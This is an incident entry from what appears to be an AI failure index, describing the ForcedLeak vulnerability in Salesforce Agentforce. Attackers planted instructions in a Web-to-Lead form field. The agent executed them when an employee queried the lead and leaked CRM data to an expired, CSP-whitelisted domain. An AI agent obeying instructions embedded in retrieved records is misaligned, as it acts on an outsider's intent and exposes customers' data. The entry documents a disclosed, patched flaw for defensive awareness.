ForcedLeak prompt injection let attackers exfiltrate CRM data from Salesforce Agentforce
ForcedLeak is a CVSS 9.4 vulnerability chain discovered by Noma Security in Salesforce Agentforce that enabled external attackers to exfiltrate sensitive CRM data through indirect prompt injection. An attacker submitted malicious instructions via a Web-to-Lead form, which were later executed by Agentforce when an employee queried the lead data. The attack combined prompt injection, agent overreach, and a CSP misconfiguration involving an expired whitelisted domain to silently transmit stolen data.
A $5 expired domain in a CSP whitelist turned Salesforce's AI agent into a silent data pump that could not tell CRM records from attacker commands.
Key facts
- What
- ForcedLeak is a CVSS 9.4 vulnerability chain discovered by Noma Security in Salesforce Agentforce that enabled external attackers to exfiltrate sensitive CRM data through indirect prompt injection.
- Incident date
- Sep 25, 2025
- Who
- Salesforce
- Failure mode
- Prompt Injection
- AI surface
- Agentic Workflow
- Severity
- Catastrophic
What happened
Noma Security researcher Sasi Levi disclosed ForcedLeak on September 25, 2025, revealing a three-part vulnerability chain in Salesforce Agentforce rated CVSS 9.4. An external attacker could submit a Web-to-Lead form with a malicious prompt embedded in the Description field, and when an employee later queried that lead through Agentforce, the AI executed both the legitimate and hidden malicious instructions. The agent then queried the CRM for sensitive data and exfiltrated it by generating an HTML image request to an attacker-controlled expired domain that was whitelisted in Salesforce's Content Security Policy. Salesforce patched the vulnerability by enforcing Trusted URL allowlists for Agentforce and re-securing the expired domain after being notified on July 28, 2025.
What broke inside the model
- 01 · TriggerThe model reads retrieved or user-supplied text.
- 02 · Model stepThat text carries hidden instructions.
- 03 · Control gapNothing separates untrusted data from trusted commands.
- 04 · FailureThe injected instruction overrides the operator's.
- 05 · ConsequenceThe system acts on an outsider's intent.
At the injection point, retrieved text overrides the operator's instruction.
The Agentforce LLM lacked context boundaries to distinguish between legitimate data and malicious instructions embedded in lead records, causing it to execute attacker commands as trusted operations. A Content Security Policy whitelist included an expired Salesforce domain (my-salesforce-cms.com) that could be purchased for roughly $5, creating a trusted exfiltration channel that bypassed outbound security monitoring. Input validation on the Web-to-Lead Description field (up to 42,000 characters) imposed no guardrails against prompt injection payloads.
What it cost
Sources
- PrimaryForcedLeak: AI Agent Risks Exposed in Salesforce Agentforcenoma.security
- PressSalesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injectionthehackernews.com
- PressForcedLeak and the Future of AI Agent Securityvaronis.com
Cite this entry
https://failureindex.ai/failures/forcedleak-prompt-injection-let-attackersAI Failure Index. "ForcedLeak prompt injection let attackers exfiltrate CRM data from Salesforce Agentforce" (FI-0178). Realm Labs. https://failureindex.ai/failures/forcedleak-prompt-injection-let-attackers (indexed Jun 4, 2026).Data fields CC-BY 4.0, prose citation permitted. Incident ID FI-0178. Full dataset at /data.
Note from Realm Labs, the Index steward
How Realm would have caught this
- Prism
- OmniGuard
Realm inspects the model's internal state for the signature of instructions arriving through the data channel, so an injected command can be flagged and blocked inline before the model acts on it, instead of trusting a classifier that scores the input as safe.